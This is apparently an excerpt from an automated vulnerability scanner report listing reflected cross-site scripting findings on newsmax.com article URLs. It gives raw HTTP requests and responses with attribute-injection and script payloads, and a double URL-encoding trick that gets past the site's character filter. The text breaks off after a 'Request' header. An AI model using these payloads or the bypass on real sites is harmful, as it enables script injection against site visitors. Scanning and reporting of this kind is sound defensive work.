<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(38991775ff3"><img src=a onerror=alert(1)>a2bddf3f416);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21de8'%20a%3db%20a07cd9ef265 was submitted in the REST URL parameter 7. This input was echoed as 21de8' a=b a07cd9ef265 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991721de8'%20a%3db%20a07cd9ef265 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... ors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991721de8' a=b a07cd9ef265' class="article_tools_link"> ...[SNIP]...
1.31. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65d2a'><script>alert(1)</script>7d93cfc3716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?65d2a'><script>alert(1)</script>7d93cfc3716=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46187 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... rs/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?65d2a'><script>alert(1)</script>7d93cfc3716=1' class="article_tools_link"> ...[SNIP]...
1.32. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7ca"><script>alert(1)</script>8c20879ddf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?bb7ca"><script>alert(1)</script>8c20879ddf6=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46192 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... end?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?bb7ca"><script>alert(1)</script>8c20879ddf6=1')" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94c9a'%20a%3db%209229f875432 was submitted in the REST URL parameter 2. This input was echoed as 94c9a' a=b 9229f875432 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips94c9a'%20a%3db%209229f875432/2011/03/17/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:44 GMT Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19c4d'%20a%3db%20cea8d56507b was submitted in the REST URL parameter 3. This input was echoed as 19c4d' a=b cea8d56507b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/201119c4d'%20a%3db%20cea8d56507b/03/17/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:52 GMT Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8e50'%20a%3db%20879e713f874 was submitted in the REST URL parameter 4. This input was echoed as f8e50' a=b 879e713f874 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03f8e50'%20a%3db%20879e713f874/17/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:06 GMT Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7782c'%20a%3db%20781375d999b was submitted in the REST URL parameter 5. This input was echoed as 7782c' a=b 781375d999b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/177782c'%20a%3db%20781375d999b/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:28 GMT Connection: close
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e65'%20a%3db%20c8f5f821c94 was submitted in the REST URL parameter 7. This input was echoed as 45e65' a=b c8f5f821c94 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/37184445e65'%20a%3db%20c8f5f821c94 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41015 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/37184445e65' a=b c8f5f821c94' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7def0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e19683aed965 was submitted in the REST URL parameter 7. This input was echoed as 7def0"><img src=a onerror=alert(1)>19683aed965 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/3718447def0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e19683aed965 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41463 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(3718447def0"><img src=a onerror=alert(1)>19683aed965);" class="article_tools_link"> ...[SNIP]...
1.39. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4e7"><script>alert(1)</script>650306665dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?7b4e7"><script>alert(1)</script>650306665dd=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45825 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 5 Thi ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?7b4e7"><script>alert(1)</script>650306665dd=1')" class="article_tools_link"> ...[SNIP]...
1.40. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad59e'><script>alert(1)</script>63cdc65a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?ad59e'><script>alert(1)</script>63cdc65a388=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45820 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 5 Thi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?ad59e'><script>alert(1)</script>63cdc65a388=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e86'%20a%3db%20d8e0adc0dea was submitted in the REST URL parameter 2. This input was echoed as a0e86' a=b d8e0adc0dea in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptomsa0e86'%20a%3db%20d8e0adc0dea/2011/03/18/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptomsa0e86' a=b d8e0adc0dea/2011/03/18/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 816cd'%20a%3db%204633045dbf2 was submitted in the REST URL parameter 3. This input was echoed as 816cd' a=b 4633045dbf2 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011816cd'%20a%3db%204633045dbf2/03/18/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011816cd' a=b 4633045dbf2/03/18/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c054'%20a%3db%207544e1c0dda was submitted in the REST URL parameter 4. This input was echoed as 3c054' a=b 7544e1c0dda in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/033c054'%20a%3db%207544e1c0dda/18/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/033c054' a=b 7544e1c0dda/18/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b419'%20a%3db%20a7627bebbad was submitted in the REST URL parameter 5. This input was echoed as 4b419' a=b a7627bebbad in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/184b419'%20a%3db%20a7627bebbad/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/184b419' a=b a7627bebbad/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05f4%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee0d02c828fc was submitted in the REST URL parameter 7. This input was echoed as d05f4"><img src=a onerror=alert(1)>e0d02c828fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
